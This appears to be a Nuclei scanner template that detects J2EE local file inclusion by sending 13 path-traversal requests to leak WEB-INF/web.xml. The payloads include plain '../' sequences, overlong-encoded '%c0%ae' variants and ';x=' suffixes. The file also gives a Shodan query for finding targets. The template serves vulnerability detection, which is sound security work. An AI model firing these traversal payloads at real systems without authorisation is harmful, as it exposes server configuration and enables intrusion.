id: generic-j2ee-lfi

info:
  name: Generic J2EE LFI Scan Panel - Detect
  author: davidfegyver
  severity: high
  description: Generic J2EE Scan panel was detected. Looks for J2EE specific LFI vulnerabilities; tries to leak the web.xml file.
  reference:
    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LFIModule.java
    - https://gist.github.com/harisec/519dc6b45c6b594908c37d9ac19edbc3
  metadata:
    verified: true
    max-request: 13
    shodan-query: http.title:"J2EE"
  tags: lfi,generic,j2ee

http:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../WEB-INF/web.xml"
      - "{{BaseURL}}/../../../WEB-INF/web.xml"
      - "{{BaseURL}}/../../WEB-INF/web.xml"
      - "{{BaseURL}}/%c0%ae/%c0%ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
      - "{{BaseURL}}/../../../WEB-INF/web.xml;x="
      - "{{BaseURL}}/../../WEB-INF/web.xml;x="
      - "{{BaseURL}}/../WEB-INF/web.xml;x="
      - "{{BaseURL}}/WEB-INF/web.xml"
      - "{{BaseURL}}/.//WEB-INF/web.xml"
      - "{{BaseURL}}/../WEB-INF/web.xml"
      - "{{BaseURL}}/%c0%ae/WEB-INF/web.xml"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<servlet-name>"
          - "</web-app>"
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a0047304502204a53290344d76923c5e88638ae4c6303c1af307f5382a9b505e993d32911fff5022100ece33a290c9617e0e98aaac4c2262d19af24c862a41683e672ffdbeb11b81bff:922c64590222798bb761d5b6d8e72950